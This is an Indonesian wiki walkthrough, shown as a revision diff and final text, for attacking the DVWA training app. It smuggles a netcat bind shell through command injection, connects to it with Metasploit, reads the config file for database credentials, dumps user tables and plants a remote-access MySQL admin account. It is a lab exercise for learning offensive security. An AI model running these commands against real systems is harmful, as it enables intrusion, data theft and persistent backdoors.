Difference between revisions of "DVWA: Exploit menggunakan Metasploit"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (New page: ==Persiapan== Masuk ke DVWA, misalnya http://192.168.0.80/DVWA-1.9 username admin password password Klik DVWA Security > Security Level Low > Submit) |
Onnowpurbo (talk | contribs) |
||
| (8 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
| + | Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | ||
| + | |||
==Persiapan== | ==Persiapan== | ||
| Line 11: | Line 13: | ||
DVWA Security > Security Level Low > Submit | DVWA Security > Security Level Low > Submit | ||
| + | |||
| + | |||
| + | ==Siapkan NetCat== | ||
| + | |||
| + | Masuk ke DVWA Command Injection, lakukan | ||
| + | |||
| + | 192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | ||
| + | |||
| + | Dimana 192.168.0.100 adalah IP address server DVWA | ||
| + | |||
| + | Teknik ini akan membuka server pada port 4444 menggunakan NC .... | ||
| + | Ini tempat masuk bagi Metasploit. | ||
| + | |||
| + | ==Gunakan metasploit== | ||
| + | |||
| + | Jalankan | ||
| + | |||
| + | msfconsole thankyou | ||
| + | |||
| + | Lakukan | ||
| + | |||
| + | |||
| + | use multi/handler | ||
| + | set PAYLOAD linux/x86/shell/bind_tcp | ||
| + | show options | ||
| + | set RHOST 192.168.0.100 | ||
| + | exploit | ||
| + | |||
| + | Cek password | ||
| + | |||
| + | whoami | ||
| + | grep www-data /etc/passwd | ||
| + | grep www-data /etc/group | ||
| + | |||
| + | |||
| + | Cek Password melalui konfigurasi Web | ||
| + | |||
| + | ps -eaf | grep http | ||
| + | pwd | ||
| + | ls -ld /var/www/html | ||
| + | ls -ld /var/www/html/DVWA* | ||
| + | ls -l /var/www/html/DVWA* | ||
| + | |||
| + | Cari password database | ||
| + | |||
| + | ls -l /var/www/html/DVWA-1.9/config | ||
| + | cat /var/www/html/DVWA-1.9/config/config.inc.php | ||
| + | |||
| + | Explorasi database, asumsi username MySQL root, password 123456 | ||
| + | |||
| + | |||
| + | echo "show databases;" | mysql -uroot -p123456 | ||
| + | echo "use dvwa; show tables;" | mysql -uroot -p123456 | ||
| + | echo "use dvwa; desc users;" | mysql -uroot -p123456 | ||
| + | echo "select * from dvwa.users;" | mysql -uroot -p123456 | ||
| + | |||
| + | Buat user baru | ||
| + | |||
| + | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456 | ||
| + | echo "select * from dvwa.users;" | mysql -uroot -p123456 | ||
| + | |||
| + | Lihat informasi tabel MySQL | ||
| + | |||
| + | |||
| + | echo "show databases;" | mysql -uroot -p123456 | ||
| + | echo "use mysql; show tables;" | mysql -uroot -p123456 | ||
| + | |||
| + | Ini bagian paling berbahaya, buat user MySQL yang baru | ||
| + | |||
| + | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 | ||
| + | echo "select * from mysql.user;" | mysql -uroot -p123456 | ||
| + | |||
| + | Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( .. | ||
| + | |||
| + | ==Cek dari console Kali Linux== | ||
| + | |||
| + | mysql -u db_hacker -h 192.168.0.100 -pabc123 | ||
| + | show databases; | ||
| + | quit | ||
| + | |||
| + | ==Referensi== | ||
| + | |||
| + | * https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | ||
Latest revision as of 04:18, 4 May 2017
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Siapkan NetCat
Masuk ke DVWA Command Injection, lakukan
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dimana 192.168.0.100 adalah IP address server DVWA
Teknik ini akan membuka server pada port 4444 menggunakan NC .... Ini tempat masuk bagi Metasploit.
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep www-data /etc/passwd grep www-data /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/DVWA-1.9/config cat /var/www/html/DVWA-1.9/config/config.inc.php
Explorasi database, asumsi username MySQL root, password 123456
echo "show databases;" | mysql -uroot -p123456 echo "use dvwa; show tables;" | mysql -uroot -p123456 echo "use dvwa; desc users;" | mysql -uroot -p123456 echo "select * from dvwa.users;" | mysql -uroot -p123456
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -p123456 echo "use mysql; show tables;" | mysql -uroot -p123456
Ini bagian paling berbahaya, buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 echo "select * from mysql.user;" | mysql -uroot -p123456
Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..
Cek dari console Kali Linux
mysql -u db_hacker -h 192.168.0.100 -pabc123 show databases; quit